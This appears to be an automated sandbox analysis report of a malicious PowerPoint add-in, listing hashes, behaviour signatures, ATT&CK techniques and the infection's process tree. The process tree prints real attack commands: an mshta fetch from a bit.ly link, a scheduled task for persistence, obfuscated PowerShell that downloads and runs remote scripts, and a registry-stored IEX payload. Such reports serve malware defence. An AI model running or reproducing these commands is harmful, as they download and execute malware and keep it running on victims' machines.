Analysis

  • max time kernel
    151s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    17-07-2021 06:49

General

  • Target

    SO-19844 EIDCO.ppam

  • Size

    14KB

  • MD5

    24dd86688a277a16ca013809c71ab8c0

  • SHA1

    d3a1915ced9501a7ce269ee1ace23b4a50c8c5cd

  • SHA256

    643ce9630631fdc9051b4be5b3bd9d60281885380fb2fa777379711d938c3c91

  • SHA512

    89888f15eaacf0404e460830f497b2465bbaf75276e5cf5b0ae7420f50f9c00c4392479bb2cee291acbeefda71e4dd4d603b915244ed932d84608f8fc65b5119

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 19 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\SO-19844 EIDCO.ppam"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1696
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1656
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://www.bitly.com/ashjdkqodasdasdasdwdhqowdh
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:268
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""BlueStacks"" /F /tr ""\""MsHtA""\""http://1230948%1230948@0v2x.blogspot.com/p/34.html\""
          3⤵
          • Creates scheduled task(s)
          PID:1928
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601408.us.archive.org/12/items/psteric/psteric.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601408.us.archive.org/12/items/psteric/1.txt').GetResponse().GetResponseStream()).ReadToend());
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2032
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe ((gp HKCU:\Software).cookerr)|IEX
      1⤵
      • Process spawned unexpected child process
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:960

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    2
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      MD5

      2902de11e30dcc620b184e3bb0f0c1cb

      SHA1

      5d11d14a2558801a2688dc2d6dfad39ac294f222

      SHA256

      e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

      SHA512

      efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      MD5

      dd6f71ec23ec79fa6fa2d2a207bffdfa

      SHA1

      3a768d9278f63f40d1ae1b7e90b0e23bece9bae7

      SHA256

      46438c70c457ab8030c38abf0f0d5db44168b3d908b312ef24db0db9b0965243

      SHA512

      7e8231671fac6f63d1d69246f4a0dd5d58c2f98f34c80e1fc30fe12c98a267baa55d50c0b9702d2ddbcc4ffca870bbd55d9e4adbfcb092bf7478f0d38e013109

    • memory/268-65-0x0000000000000000-mapping.dmp
    • memory/268-77-0x00000000052A3000-0x00000000052A4000-memory.dmp
      Filesize

      4KB

    • memory/960-68-0x0000000001DC0000-0x0000000001DC1000-memory.dmp
      Filesize

      4KB

    • memory/960-83-0x0000000002710000-0x0000000002711000-memory.dmp
      Filesize

      4KB

    • memory/960-99-0x00000000025E0000-0x00000000025E1000-memory.dmp
      Filesize

      4KB

    • memory/960-98-0x00000000025D0000-0x00000000025D1000-memory.dmp
      Filesize

      4KB

    • memory/960-79-0x000000001B4C0000-0x000000001B4C1000-memory.dmp
      Filesize

      4KB

    • memory/960-69-0x000000001AC10000-0x000000001AC11000-memory.dmp
      Filesize

      4KB

    • memory/960-86-0x000000001AB20000-0x000000001AB21000-memory.dmp
      Filesize

      4KB

    • memory/960-81-0x000000001C410000-0x000000001C411000-memory.dmp
      Filesize

      4KB

    • memory/960-73-0x00000000023C0000-0x00000000023C1000-memory.dmp
      Filesize

      4KB

    • memory/960-74-0x000000001AB90000-0x000000001AB92000-memory.dmp
      Filesize

      8KB

    • memory/960-75-0x000000001AB94000-0x000000001AB96000-memory.dmp
      Filesize

      8KB

    • memory/960-76-0x00000000024F0000-0x00000000024F1000-memory.dmp
      Filesize

      4KB

    • memory/1656-62-0x0000000000000000-mapping.dmp
    • memory/1656-64-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmp
      Filesize

      8KB

    • memory/1696-66-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1696-59-0x0000000073AE1000-0x0000000073AE5000-memory.dmp
      Filesize

      16KB

    • memory/1696-63-0x0000000075211000-0x0000000075213000-memory.dmp
      Filesize

      8KB

    • memory/1696-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1696-60-0x0000000071141000-0x0000000071143000-memory.dmp
      Filesize

      8KB

    • memory/1928-70-0x0000000000000000-mapping.dmp
    • memory/2032-80-0x0000000000C50000-0x0000000000C51000-memory.dmp
      Filesize

      4KB

    • memory/2032-78-0x00000000023E0000-0x000000000302A000-memory.dmp
      Filesize

      12.3MB

    • memory/2032-82-0x00000000048C0000-0x00000000048C1000-memory.dmp
      Filesize

      4KB

    • memory/2032-71-0x0000000000000000-mapping.dmp
    • memory/2032-100-0x00000000025C0000-0x00000000025C1000-memory.dmp
      Filesize

      4KB

    • memory/2032-101-0x0000000005340000-0x0000000005341000-memory.dmp
      Filesize

      4KB